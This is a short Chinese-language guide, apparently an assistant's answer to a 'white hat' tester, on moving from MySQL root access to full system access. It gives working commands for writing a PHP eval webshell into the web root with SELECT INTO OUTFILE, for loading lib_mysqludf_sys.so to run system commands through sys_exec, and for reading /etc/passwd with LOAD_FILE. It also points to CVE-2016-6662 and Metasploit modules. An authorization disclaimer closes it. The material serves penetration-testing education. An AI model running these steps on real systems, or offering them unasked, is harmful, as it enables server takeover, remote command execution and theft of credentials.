作为一名白帽子，如果您在渗透测试中获得了数据库的 root 权限，您可以采取以下步骤来进一步评估系统的安全性：

1. 获取系统权限：

利用 SELECT INTO OUTFILE 语句写入 WebShell： 在已知 Web 服务器物理路径的情况下，您可以使用以下 SQL 语句将一句话 WebShell 写入服务器：

SELECT '<?php @eval($_POST["cmd"]);?>' INTO OUTFILE '/var/www/html/shell.php';

这将创建一个名为 shell.php 的文件，您可以通过访问该文件并传递命令来执行系统命令。

使用用户自定义函数（UDF）提权： 通过创建自定义的共享库文件并将其加载到数据库中，您可以执行任意系统命令。具体步骤包括：

1. 查找插件目录：

SHOW VARIABLES LIKE '%plugin%';


2. 将编译好的共享库文件（如 lib_mysqludf_sys.so）上传到插件目录。


3. 在数据库中创建相应的函数：

CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';


4. 使用创建的函数执行系统命令：

SELECT sys_exec('id');



请注意，使用 UDF 提权需要满足一定条件，如数据库具有写入权限等。



2. 查找敏感信息：

读取配置文件： 数据库的配置文件可能包含敏感信息，如其他服务的凭据。您可以使用 LOAD_FILE 函数读取这些文件：

SELECT LOAD_FILE('/etc/passwd');



3. 利用已知漏洞：

CVE-2016-6662 漏洞： 此漏洞允许攻击者通过修改 MySQL 配置文件，在服务重启时加载恶意库文件，从而以 root 权限执行任意代码。利用此漏洞需要满足以下条件：

拥有 MySQL 的 SQL Shell 访问权限。

能够促使 MySQL 服务重启。 具体利用方法可以参考相关安全公告。




4. 使用渗透测试工具：

Metasploit： 作为广泛使用的渗透测试框架，Metasploit 提供了多种模块来利用数据库权限进行进一步的渗透测试。您可以使用 Metasploit 的 mysql_sql 模块执行自定义的 SQL 命令，或使用其他相关模块进行漏洞利用。




注意事项： 在进行上述操作时，请确保已获得被测系统所有者的明确授权。所有操作应严格遵守相关法律法规和道德准则，避免对系统造成不必要的影响。

通过这些方法，您可以在获得数据库 root 权限后，进一步评估系统的安全性，发现潜在的安全漏洞，并为系统管理员提供改进建议。